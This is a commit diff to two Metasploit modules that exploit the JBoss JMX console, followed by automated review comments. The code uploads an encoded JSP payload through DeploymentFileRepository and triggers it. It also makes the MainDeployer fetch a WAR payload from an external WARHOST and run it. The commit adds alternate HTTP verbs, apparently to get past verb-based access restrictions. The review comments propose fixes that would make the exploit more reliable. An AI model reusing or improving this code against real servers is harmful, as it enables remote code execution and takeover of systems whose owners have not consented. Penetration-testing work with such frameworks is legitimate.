make sure to use correct verbs, thanks mc!

git-svn-id: file:///home/svn/framework3/trunk@9285 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-05-11 16:20:46 +00:00
parent 4cfc84a2e4
commit 711e08b5e9
2 changed files with 75 additions and 30 deletions


@ -67,21 +67,40 @@ class Metasploit3 < Msf::Exploit::Remote
fname = rand_text_alpha_upper(rand(5) + 1) fname = rand_text_alpha_upper(rand(5) + 1)
res = send_request_cgi( data = 'action=invokeOp'
{ data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
'uri' => '/jmx-console/HtmlAdaptor', data << '&methodIndex=5'
'method' => datastore['VERB'], data << '&arg0=' + Rex::Text.uri_encode(datastore['PATH'])
'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' + data << '&arg1=' + fname
Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' + data << '&arg2=.jsp'
Rex::Text.uri_encode(payload.encoded) + '&arg4=True', data << '&arg3=' + Rex::Text.uri_encode(payload.encoded)
}) data << '&arg4=True'
if (datastore['VERB'] == "POST")
res = send_request_cgi(
{
'uri' => '/jmx-console/HtmlAdaptor',
'method' => datastore['VERB'],
'data' => data
})
else
res = send_request_cgi(
{
'uri' => '/jmx-console/HtmlAdaptor;index.jsp?' + data,
'method' => datastore['VERB'],
})
end
if (res.code == 200) if (res.code == 200)
print_status("Triggering payload at '#{datastore['URI']}#{fname}.jsp'...") print_status("Triggering payload at '#{datastore['URI']}#{fname}.jsp'...")
verb = 'GET'
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
verb = 'HEAD'
end
send_request_raw( send_request_raw(
{ {
'uri' => datastore['URI'] + fname + '.jsp', 'uri' => datastore['URI'] + fname + '.jsp',
'method' => 'GET', 'method' => verb,
}) })
else else
print_error("Denied...") print_error("Denied...")
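Review bot: `if (res.code == 200)` reads the response without checking that one came back, and this change now assigns `res` from two separate request branches. The other file in this commit guards with `if (! res)` before touching the response, which suggests send_request_cgi can return nil; a matching guard here, `if (res and res.code == 200)`, would route a missing response to the existing "Denied..." branch instead of raising NoMethodError. The verb-selection lines (`verb = 'GET'` followed by the `verb = 'HEAD'` fallback) are repeated verbatim in the other file's last hunk and would be easier to keep consistent as one shared helper. The enclosing method starts and ends outside this hunk.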


@ -71,8 +71,9 @@ class Metasploit3 < Msf::Exploit::Remote
Opt::RPORT(8080), Opt::RPORT(8080),
OptString.new('USERNAME', [ false, 'The username to authenticate as' ]), OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username' ]), OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console']), OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console' ]),
OptString.new('VERB', [ true, 'The HTTP verb to use', 'POST']), OptString.new('VERB', [ true, 'The HTTP verb to use', 'POST' ]),
OptString.new('WARHOST', [ false, 'The host to request the WAR payload from' ]),
], self.class) ], self.class)
end end
@ -149,21 +150,42 @@ class Metasploit3 < Msf::Exploit::Remote
'Path' => resource_uri 'Path' => resource_uri
}}) }})
print_status("Making the request to the MainDeployer...") if (datastore['WARHOST'])
res = send_request_cgi({ service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'] + resource_uri
'method' => datastore['VERB'], end
'uri' => datastore['PATH'] + '/HtmlAdaptor', #method_index = jboss_detect_method_index
'vars_post' => print_status("Asking the JBoss server to deploy (via MainDeployer) #{service_url}")
{ if (datastore['VERB'] == "POST")
'action' => 'invokeOp', res = send_request_cgi({
'name' => 'jboss.system:service=MainDeployer', 'method' => datastore['VERB'],
# deploy via java.net.URL 'uri' => datastore['PATH'] + '/HtmlAdaptor',
'methodIndex' => '3', # jboss 4.0.5 'vars_post' =>
#'methodIndex' => '21', # jboss 3.0.8 {
#'methodIndex' => '23', # jboss 3.2.7 'action' => 'invokeOp',
'arg0' => service_url 'name' => 'jboss.system:service=MainDeployer',
} # deploy via java.net.URL
}, 20) 'methodIndex' => '3', # jboss 4.0.5
#'methodIndex' => '21', # jboss 3.0.8
#'methodIndex' => '23', # jboss 3.2.7
'arg0' => service_url
}
})
else
res = send_request_cgi({
'method' => datastore['VERB'],
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_get' =>
{
'action' => 'invokeOp',
'name' => 'jboss.system:service=MainDeployer',
# deploy via java.net.URL
'methodIndex' => '3', # jboss 4.0.5
#'methodIndex' => '21', # jboss 3.0.8
#'methodIndex' => '23', # jboss 3.2.7
'arg0' => service_url
}
})
end
if (! res) if (! res)
raise RuntimeError, "Unable to deploy WAR archive [No Response]" raise RuntimeError, "Unable to deploy WAR archive [No Response]"
end end
@ -194,10 +216,14 @@ class Metasploit3 < Msf::Exploit::Remote
# EXECUTE # EXECUTE
# #
print_status("Executing #{app_base}...") print_status("Executing #{app_base}...")
verb = 'GET'
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
verb = 'HEAD'
end
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/' + app_base + '/' + jsp_name + '.jsp', 'uri' => '/' + app_base + '/' + jsp_name + '.jsp',
'method' => 'GET' 'method' => verb
}, 20) }, 20)
if (! res) if (! res)
print_error("Execution failed on #{app_base} [No Response]") print_error("Execution failed on #{app_base} [No Response]")
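Review bot: The POST and non-POST branches of the MainDeployer request are identical except for the `'vars_post'` / `'vars_get'` key, so the parameter hash and its methodIndex comments now have to be kept in sync in two places. Building the hash once and picking the key, e.g. `vars_key = (datastore['VERB'] == "POST") ? 'vars_post' : 'vars_get'` and then `vars_key => deploy_vars`, would remove the duplication. Both new calls also close with `})` where the old call passed `}, 20)`, while the execute request in the last hunk still passes `20`; if the helper's default differs, that is a silent timeout change worth confirming. The new `service_url` line joins `datastore['SRVPORT']` with `+`, which raises TypeError if that value is not a String (its type is not visible here), so interpolation would be safer: `"http://#{datastore['WARHOST']}:#{datastore['SRVPORT']}#{resource_uri}"`. The commented-out `#method_index = jboss_detect_method_index` should be removed or explained, and the enclosing method starts and ends outside these hunks.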